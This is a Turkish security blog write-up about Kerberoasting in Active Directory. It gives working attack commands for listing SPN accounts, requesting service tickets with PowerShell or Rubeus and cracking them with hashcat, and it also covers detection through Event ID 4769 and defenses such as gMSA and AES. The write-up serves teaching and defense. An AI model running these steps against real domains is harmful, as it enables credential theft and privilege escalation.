AltaySec AltaySec Arşiv Siber Güvenlik Kütüphanesi
Arşiv Network & Infrastructure Kerberoasting: Active Directory'de Sessiz Ayrıcalık Yükseltme
Write-upNetwork & Infrastructure

Kerberoasting: Active Directory'de Sessiz Ayrıcalık Yükseltme

Service account parolalarını kırarak domain'de nasıl ilerlenir?

AL
AltaySecAltaySec Red Team
26 Mayıs 2026
2 dakika okuma
Özet

Kerberoasting, Active Directory ortamlarında service account parolalarını çevrimdışı kırmak için kullanılan klasik ama hâlâ etkili bir tekniktir. Bu write-up'ta saldırının nasıl çalıştığını, tespit yöntemlerini ve savunma önlemlerini adım adım inceliyoruz.

Kerberoasting Nedir?

Kerberoasting, Active Directory’de SPN (Service Principal Name) atanmış hesapların parolalarını çevrimdışı kırmaya dayalı bir saldırıdır. Düşük yetkili herhangi bir domain kullanıcısı bu saldırıyı başlatabilir — özel bir yetki gerekmez.

Mantık şu: Kerberos’ta bir servise erişmek için TGS (Ticket Granting Service) bileti istenir. Bu bilet, servis hesabının parola hash’i ile şifrelenir. Saldırgan bileti alır ve çevrimdışı olarak parolayı kırmaya çalışır — domain’e hiç gürültü yapmadan.

Saldırı Adımları

1. SPN’leri Listele

Domain’deki SPN atanmış hesapları bul:

setspn -T domain.local -Q */*

Veya PowerView ile:

Get-NetUser -SPN | select samaccountname, serviceprincipalname

2. TGS Biletlerini Talep Et

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql.domain.local:1433"

Veya Rubeus ile tek komutta:

Rubeus.exe kerberoast /outfile:hashes.txt

3. Çevrimdışı Kır

hashcat -m 13100 hashes.txt rockyou.txt

Service account’lar genelde yıllarca değişmeyen, zayıf parolalara sahip olduğu için başarı oranı yüksektir.

Neden Bu Kadar Etkili?

Faktör Açıklama
Düşük yetki yeterli Herhangi bir domain kullanıcısı yapabilir
Çevrimdışı kırma DC’de başarısız giriş logu oluşmaz
Zayıf parolalar Service account’lar sık ihmal edilir
Yüksek ayrıcalık Servis hesapları genelde geniş yetkili olur

Tespit (Blue Team)

  • Event ID 4769 — TGS bilet talepleri. Anormal hacimde talep, özellikle RC4 (0x17) şifreleme tipi şüphelidir.
  • Tek bir hesaptan kısa sürede çok sayıda farklı SPN talebi.
  • Honeypot SPN hesabı kurun — bu hesaba gelen her talep doğrudan alarmdır.

Savunma

  1. Managed Service Accounts (gMSA) kullanın — otomatik, 120 karakterlik karmaşık parolalar.
  2. Service account parolalarını uzun ve rastgele yapın (25+ karakter).
  3. Kerberos şifrelemesini AES‘e zorlayın, RC4’ü devre dışı bırakın.
  4. Service account’lara gereksiz ayrıcalık vermeyin (Domain Admin’den uzak tutun).

Sonuç

Kerberoasting eski bir teknik ama AD ortamlarında hâlâ en sık başarılı olan ayrıcalık yükseltme yöntemlerinden biri. Savunması basit — güçlü parola ve gMSA — ama uygulanmadığı her yerde kapı açık kalır.

Kaynakça

  1. MITRE ATT&CK. T1558.003 — Kerberoasting.
  2. Microsoft. Group Managed Service Accounts Overview.
active directorykerberoskerberoastingprivilege escalationred team
AL
AltaySec
AltaySec Red Team
AltaySec Arşiv topluluğuna katkı veren yazar. Türkçe siber güvenlik bilgi tabanını birlikte büyütüyoruz.

Sen de yaz, arşivde yerini al

AltaySec Arşiv'e katkı ver — uzmanlığını Türkçe siber güvenlik literatürüne kat.

Yazar Ol